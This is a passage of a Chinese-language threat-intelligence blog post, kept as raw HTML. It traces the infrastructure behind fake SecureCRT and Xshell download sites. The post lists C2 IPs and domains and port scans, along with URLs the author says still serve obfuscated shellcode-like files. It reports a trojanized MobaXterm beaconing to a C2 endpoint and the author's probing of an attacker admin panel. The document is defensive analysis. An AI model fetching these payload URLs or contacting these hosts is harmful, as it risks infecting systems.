src="https://wechat2rss.xlab.app/img-proxy/?k=1f888876&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY93U94ib3GgYGRaaelzdEMX0hyGRlbMoNzBjCwUGVc7VwutRSalyPmGeA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">最初 47.239.5.111 也可以扫到 config.ini，内容跟上面相似，现在已经被删掉了。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">[ConfigInfo]</span><span leaf=""><br/></span><span leaf="">passUpdate=0</span><span leaf=""><br/></span></code></pre><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">还扫到一个 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://47.239.5.111/c" target="_blank">https://47.239.5.111/c</a></span></code><span leaf=""> 文件（现在还能下载到），内容也是无意义的混淆内容。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">根据其他样本的关联和猜测，这两个 URL 也能下载到类似 shellcode 的文件。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf=""><a href="https://47.239.5.111/aliyunoss" target="_blank">https://47.239.5.111/aliyunoss</a></span><span leaf=""><br/></span><span leaf=""><a href="https://47.239.5.111/aliyunoss1111" target="_blank">https://47.239.5.111/aliyunoss1111</a></span><span leaf=""><br/></span></code></pre><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">当时在攻击者关闭服务之前，还扫到一个从来没见过的 web 参数报错 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://sslupdate.net/search.php" target="_blank">https://sslupdate.net/search.php</a></span></code><span leaf=""> 。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">看参数不确定是不是攻击者 C2 服务的一部分，我刚掏出 Burp 准备测试下来着，软件打开的时候服务已经被关掉了，现在已经访问不到了。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">{</span><span style="color: #98c379;line-height: 26px;"><span leaf="">&#34;status&#34;</span></span><span leaf="">:</span><span style="color: #98c379;line-height: 26px;"><span leaf="">&#34;error&#34;</span></span><span leaf="">,</span><span style="color: #98c379;line-height: 26px;"><span leaf="">&#34;message&#34;</span></span><span leaf="">:</span><span style="color: #98c379;line-height: 26px;"><span leaf="">&#34;请提供所有查询参数：canvas、webgl 和 audio&#34;</span></span><span leaf="">}</span><span leaf=""><br/></span></code></pre><p><img data-imgfileid="100001478" class="rich_pages wxw-img" data-ratio="0.2894135567402894" data-s="300,640" data-type="png" data-w="1313" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=567e083d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9gGTaRFXNaFkvib1BZJFI9ZYMOH5dicr6Qpc39fS53KdrYFSXKqwJGkNA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">纯C2 IP - 107.148.61.185</span></span></h5><p><img data-imgfileid="100001479" class="rich_pages wxw-img" data-ratio="0.22506738544474394" data-s="300,640" data-type="png" data-w="1484" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=1ca2d33b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9wwjtMPOO334jLribiaU1ibkKvs9iahDLT1b8Dx548LRsZzmdx50lbnwI4w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">访问 9999 端口会得到一个带域名的报错，不知道运行了什么服务。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">Warning: forward host lookup failed </span><span style="color: #c678dd;line-height: 26px;"><span leaf="">for</span></span><span leaf=""> e245.bioysjt.com: h_errno 11001: HOST_NOT_FOUND</span><span leaf=""><br/></span><span leaf="">e245.bioysjt.com [107.148.61.185] 9999 (?): connection refused</span><span leaf=""><br/></span></code></pre><p><img data-imgfileid="100001480" class="rich_pages wxw-img" data-ratio="0.1452513966480447" data-s="300,640" data-type="png" data-w="1790" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=a92192ae&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9wPw3xme9DzAJo6XeraVLvDCI2EtJoRCy3tCrUjxjsEEqHzh7WhkLSA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 18px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">新增网络 ioc 拓线</span></span><span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">指根据 &#34;第一层&#34; IOC 的拓线分析关联出的新的、深层一些的 IOC 的拓线分析。</span></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">7zei[.]com - 154.19.200.212/3/4</span></span><span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">直接访问很多 web 都会得到这个报错，证书只适用于这几个域名。</span></p><p><img data-imgfileid="100001481" class="rich_pages wxw-img" data-ratio="0.21001221001221002" data-s="300,640" data-type="png" data-w="1638" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=33067dc8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9eCNEjUAJLialsUyIxASJW85ibIABibUzmwpLSetMaagVUb9NvkNhF22Og%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">解析关系如下。</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">7zei.com  154.19.200.214</span><span leaf=""><br/></span><span leaf="">88.ayyhxx.cn  154.19.200.213</span><span leaf=""><br/></span><span leaf="">m.7zei.com  154.19.200.214</span><span leaf=""><br/></span><span leaf="">www.7zei.com  154.19.200.214</span><span leaf=""><br/></span></code></pre><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">端口开放：</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">（最终猜测这可能是一台 3 IP 机器，154.19.200.212/3/4 开放端口和服务内容都是一样的。后面会具体解释论证过程。）</span></p><p><img data-imgfileid="100001482" class="rich_pages wxw-img" data-ratio="0.2324805339265851" data-s="300,640" data-type="png" data-w="1798" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=af9e58f7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9Bic9iaVc9luPaicIuJ98ws5vbUqa2iaWwEIV0r6Vibn2t6HJIVnWiaQdHRxQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">纯C2 IP - 154.19.200.133</span></span><span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">在 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">www.7zei[.]com</span></code><span leaf=""> 下载的 Xshell7.rar 当中的 MobaXterm_Personal_24.2.exe 回连了 154.19.200.133 的 8087 端口，并向 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="http://154.19.200.133:8087/count" target="_blank">http://154.19.200.133:8087/count</a></span></code><span leaf=""> POST 了数据。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">反查域名解析可以发现以下域名：</span></p><pre data-tool="mdnice编辑器" style="border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;text-align: left;margin-top: 10px;margin-bottom: 10px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;"><span data-cacheurl="" data-remoteid="" style="display: block;background: none;height: 30px;width: 100%;background-size: 40px;background-repeat: no-repeat;background-color: #282c34;margin-bottom: -7px;border-radius: 5px;background-position: 10px 10px;background-image: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/b2ONlmmVZRpfBHZoR6HeLaxQg28syricuPlESviaevSocicBW323HF5sUahR7ia7W3SOicWjE4an2rZLhrjyxmflThmG0h9WAshQib/640?wx_fmt=svg&amp;from=appmsg&#34;);"></span><code style="overflow-x: auto;padding: 16px;color: #abb2bf;padding-top: 15px;background: #282c34;border-radius: 5px;display: -webkit-box;font-family: Consolas, Monaco, Menlo, monospace;font-size: 12px;"><span leaf="">scrt.95271.pw         //空的xshell.php</span><span leaf=""><br/></span><span leaf="">scrt-admin.95271.pw   //laravel应用</span><span leaf=""><br/></span></code></pre><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">端口开放情况：<img data-imgfileid="100001484" class="rich_pages wxw-img" data-ratio="0.3057395143487859" data-s="300,640" data-type="png" data-w="1812" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=b6f078ba&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9NR1XqYdK5W6vOGtOO3fmTJqmNCqXMuCUyOFC2zG0Vibib9bjHqZ5QgTQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">通过域名来看，scrt指的应该也是 SecureCRT，不过这个 web 没有业务，首页就是一个欢迎页。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">扫到一个 xshell.php 只返回一个 error，像是某种接收回传数据的脚本。</span></p><p><img data-imgfileid="100001483" class="rich_pages wxw-img" data-ratio="0.19464720194647203" data-s="300,640" data-type="png" data-w="1644" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=34f678e3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9gkAlrKEgQr6icadHYE2aAxes4wpI2skUmyARia2UPlPibicjPWN0QibJIzw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">而这个 admin 域名的 laravel应用，看上去是某种后台？</span></p><p><img data-imgfileid="100001485" class="rich_pages wxw-img" data-ratio="0.7222777222777222" data-s="300,640" data-type="png" data-w="2002" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=2c95fe52&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9X7N709CwZjK5pzDlFH9sRAGUncH1ooHBxb8vecDCwQic4PqkuN0quKA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">login路由可以到登录页。</span></p><p><img data-imgfileid="100001486" class="rich_pages wxw-img" data-ratio="0.6138728323699422" data-s="300,640" data-type="png" data-w="1730" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=385ae81d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9JibrSePOxOXB5Rdw4Qt9YTtv6icmU1vlLsfxH7el5rGImCpnMzTJrXeg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">注册路由会触发报错。</span></p><p><img data-imgfileid="100001487" class="rich_pages wxw-img" data-ratio="0.8078291814946619" data-s="300,640" data-type="png" data-w="2248" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=27502896&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9ocFmvcuV4yxRdJ8KoenkAibckfibpPolQRz6dJwYNmp8ducPHySScznQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">摸索了一下找到了需要的参数，寻思注册进去说不定默认管理员身份，兴许能看到一些东西，最后触发了数据库的报错，未果。</span></p><p><img data-imgfileid="100001488" class="rich_pages wxw-img" data-ratio="0.23430232558139535" data-s="300,640" data-type="png" data-w="3440" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=b95c02c8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh36qPemxcn7NmfLexicsjdY9WThYX23dcrsXNgNnaEEgbricoudj3G0msun4bibuBDTlURH7GPz4HcoQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h5 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">scrt1.nyazz[.]com - 118.107.29.172</span></span><span style="display: none;"></span></h5><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://scrt1.nyazz[.]com/" target="_blank">https://scrt1.nyazz[.]com/</a></span></code><span leaf="">  是前面出现过的假冒的 SecureCRT 官网，现在已经被奇安信标记为 UTG-Q-015 （一开始还没）。</span></p><p><img data-imgfileid="100001489" class="rich_pages wxw-img" data-ratio="0.2832415420928403" data-s="300,640" data-type="png" data-w="2542" type="block" 